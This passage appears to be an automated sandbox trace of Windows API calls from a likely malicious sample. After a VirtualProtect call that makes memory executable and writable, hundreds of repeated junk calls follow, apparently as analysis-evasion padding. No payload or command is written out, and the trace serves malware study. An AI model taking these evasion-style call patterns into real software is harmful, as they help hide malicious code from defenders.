CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.505] GetACP () returned 0x4e4 [0120.877] VirtualProtect (in: lpAddress=0x565ac0, dwSize=0xf2eb, flNewProtect=0x40, lpflOldProtect=0x43ad04 | out: lpflOldProtect=0x43ad04*=0x4) returned 1 [0120.878] AddAtomA (lpString=0x0) returned 0x0 [0120.878] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.878] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.878] AddAtomA (lpString=0x0) returned 0x0 [0120.878] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.878] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.878] AddAtomA (lpString=0x0) returned 0x0 [0120.878] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.878] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.878] AddAtomA (lpString=0x0) returned 0x0 [0120.878] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.878] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.878] AddAtomA (lpString=0x0) returned 0x0 [0120.878] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.878] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.879] AddAtomA (lpString=0x0) returned 0x0 [0120.879] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.879] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.879] AddAtomA (lpString=0x0) returned 0x0 [0120.879] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.879] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.879] AddAtomA (lpString=0x0) returned 0x0 [0120.879] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.879] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.879] AddAtomA (lpString=0x0) returned 0x0 [0120.879] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.879] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.879] AddAtomA (lpString=0x0) returned 0x0 [0120.879] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.879] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.879] AddAtomA (lpString=0x0) returned 0x0 [0120.879] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.879] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.879] AddAtomA (lpString=0x0) returned 0x0 [0120.879] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.879] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.879] AddAtomA (lpString=0x0) returned 0x0 [0120.879] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.879] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.879] AddAtomA (lpString=0x0) returned 0x0 [0120.880] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.880] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.880] AddAtomA (lpString=0x0) returned 0x0 [0120.880] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.880] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.880] AddAtomA (lpString=0x0) returned 0x0 [0120.880] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.880] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.880] AddAtomA (lpString=0x0) returned 0x0 [0120.880] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.880] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.880] AddAtomA (lpString=0x0) returned 0x0 [0120.880] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.880] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.880] AddAtomA (lpString=0x0) returned 0x0 [0120.880] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.880] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.880] AddAtomA (lpString=0x0) returned 0x0 [0120.880] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.880] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.880] AddAtomA (lpString=0x0) returned 0x0 [0120.880] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.880] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.880] AddAtomA (lpString=0x0) returned 0x0 [0120.881] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.881] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.881] AddAtomA (lpString=0x0) returned 0x0 [0120.881] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.881] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.881] AddAtomA (lpString=0x0) returned 0x0 [0120.881] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.881] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.881] AddAtomA (lpString=0x0) returned 0x0 [0120.881] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.881] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.881] AddAtomA (lpString=0x0) returned 0x0 [0120.881] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.881] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.881] AddAtomA (lpString=0x0) returned 0x0 [0120.881] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.881] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.881] AddAtomA (lpString=0x0) returned 0x0 [0120.881] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.881] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.881] AddAtomA (lpString=0x0) returned 0x0 [0120.881] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.881] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.881] AddAtomA (lpString=0x0) returned 0x0 [0120.881] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.882] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.882] AddAtomA (lpString=0x0) returned 0x0 [0120.882] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.882] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.882] AddAtomA (lpString=0x0) returned 0x0 [0120.882] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.882] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.882] AddAtomA (lpString=0x0) returned 0x0 [0120.882] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.882] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.882] AddAtomA (lpString=0x0) returned 0x0 [0120.882] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.882] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.882] AddAtomA (lpString=0x0) returned 0x0 [0120.882] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.882] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.882] AddAtomA (lpString=0x0) returned 0x0 [0120.882] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.882] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.882] AddAtomA (lpString=0x0) returned 0x0 [0120.882] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.882] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.882] AddAtomA (lpString=0x0) returned 0x0 [0120.882] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.883] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.883] AddAtomA (lpString=0x0) returned 0x0 [0120.883] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.883] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.883] AddAtomA (lpString=0x0) returned 0x0 [0120.883] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.883] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.883] AddAtomA (lpString=0x0) returned 0x0 [0120.883] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.883] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.883] AddAtomA (lpString=0x0) returned 0x0 [0120.883] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.883] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.883] AddAtomA (lpString=0x0) returned 0x0 [0120.883] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.883] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.883] AddAtomA (lpString=0x0) returned 0x0 [0120.883] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.883] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.883] AddAtomA (lpString=0x0) returned 0x0 [0120.883] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.883] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.883] AddAtomA (lpString=0x0) returned 0x0 [0120.883] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.884] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.884] AddAtomA (lpString=0x0) returned 0x0 [0120.884] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.884] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.884] AddAtomA (lpString=0x0) returned 0x0 [0120.884] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.884] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.884] AddAtomA (lpString=0x0) returned 0x0 [0120.884] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.885] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.885] AddAtomA (lpString=0x0) returned 0x0 [0120.885] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.885] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.885] AddAtomA (lpString=0x0) returned 0x0 [0120.885] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.885] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.885] AddAtomA (lpString=0x0) returned 0x0 [0120.885] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.885] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.885] AddAtomA (lpString=0x0) returned 0x0 [0120.885] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.885] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.885] AddAtomA (lpString=0x0) returned 0x0 [0120.885] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.885] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.885] AddAtomA (lpString=0x0) returned 0x0 [0120.885] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.885] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.885] AddAtomA (lpString=0x0) returned 0x0 [0120.885] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.885] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.885] AddAtomA (lpString=0x0) returned 0x0 [0120.885] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.885] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.886] AddAtomA (lpString=0x0) returned 0x0 [0120.886] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.886] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.886] AddAtomA (lpString=0x0) returned 0x0 [0120.886] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.886] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.886] AddAtomA (lpString=0x0) returned 0x0 [0120.886] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.886] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.886] AddAtomA (lpString=0x0) returned 0x0 [0120.886] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.886] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.886] AddAtomA (lpString=0x0) returned 0x0 [0120.886] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.886] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.886] AddAtomA (lpString=0x0) returned 0x0 [0120.886] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.886] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.886] AddAtomA (lpString=0x0) returned 0x0 [0120.886] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.886] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.886] AddAtomA (lpString=0x0) returned 0x0 [0120.886] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.886] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.887] AddAtomA (lpString=0x0) returned 0x0 [0120.887] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.887] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.887] AddAtomA (lpString=0x0) returned 0x0 [0120.887] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.887] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.887] AddAtomA (lpString=0x0) returned 0x0 [0120.887] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.887] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.887] AddAtomA (lpString=0x0) returned 0x0 [0120.887] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.887] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.887] AddAtomA (lpString=0x0) returned 0x0 [0120.887] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.887] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.887] AddAtomA (lpString=0x0) returned 0x0 [0120.887] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.887] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.887] AddAtomA (lpString=0x0) returned 0x0 [0120.887] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.887] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.887] AddAtomA (lpString=0x0) returned 0x0 [0120.887] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.887] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.887] AddAtomA (lpString=0x0) returned 0x0 [0120.888] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.888] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.888] AddAtomA (lpString=0x0) returned 0x0 [0120.888] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.888] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.888] AddAtomA (lpString=0x0) returned 0x0 [0120.888] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.888] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.888] AddAtomA (lpString=0x0) returned 0x0 [0120.888] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.888] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.888] AddAtomA (lpString=0x0) returned 0x0 [0120.888] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.888] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.888] AddAtomA (lpString=0x0) returned 0x0 [0120.888] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.888] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.888] AddAtomA (lpString=0x0) returned 0x0 [0120.888] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.888] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.888] AddAtomA (lpString=0x0) returned 0x0 [0120.888] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.888] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.888] AddAtomA (lpString=0x0) returned 0x0 [0120.889] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.889] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.889] AddAtomA (lpString=0x0) returned 0x0 [0120.889] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.889] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.889] AddAtomA (lpString=0x0) returned 0x0 [0120.889] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.889] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.889] AddAtomA (lpString=0x0) returned 0x0 [0120.889] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.889] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.889] AddAtomA (lpString=0x0) returned 0x0 [0120.889] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.889] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.889] AddAtomA (lpString=0x0) returned 0x0 [0120.889] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.889] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.889] AddAtomA (lpString=0x0) returned 0x0 [0120.889] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.889] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.889] AddAtomA (lpString=0x0) returned 0x0 [0120.889] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.889] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.889] AddAtomA (lpString=0x0) returned 0x0 [0120.890] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.890] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.890] AddAtomA (lpString=0x0) returned 0x0 [0120.890] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.933] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.933] AddAtomA (lpString=0x0) returned 0x0 [0120.933] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.933] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.933] AddAtomA (lpString=0x0) returned 0x0 [0120.933] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.933] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.933] AddAtomA (lpString=0x0) returned 0x0 [0120.933] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.933] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.934] AddAtomA (lpString=0x0) returned 0x0 [0120.934] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.934] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.934] AddAtomA (lpString=0x0) returned 0x0 [0120.934] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.934] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.934] AddAtomA (lpString=0x0) returned 0x0 [0120.934] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.934] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.934] AddAtomA (lpString=0x0) returned 0x0 [0120.934] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.934] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.934] AddAtomA (lpString=0x0) returned 0x0 [0120.934] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.934] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.934] AddAtomA (lpString=0x0) returned 0x0 [0120.934] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.934] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.934] AddAtomA (lpString=0x0) returned 0x0 [0120.934] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.934] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.934] AddAtomA (lpString=0x0) returned 0x0 [0120.934] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.934] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.935] AddAtomA (lpString=0x0) returned 0x0 [0120.935] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.935] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.935] AddAtomA (lpString=0x0) returned 0x0 [0120.935] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.935] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.935] AddAtomA (lpString=0x0) returned 0x0 [0120.935] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.935] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.935] AddAtomA (lpString=0x0) returned 0x0 [0120.935] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.935] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.935] AddAtomA (lpString=0x0) returned 0x0 [0120.935] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.935] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.935] AddAtomA (lpString=0x0) returned 0x0 [0120.935] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.935] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.935] AddAtomA (lpString=0x0) returned 0x0 [0120.935] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.935] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.935] AddAtomA (lpString=0x0) returned 0x0 [0120.935] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.935] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0120.936] AddAtomA (lpString=0x0) returned 0x0 [0120.936] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0120.936] GetCurrentDirectoryA (in: nBufferLength=0x0, 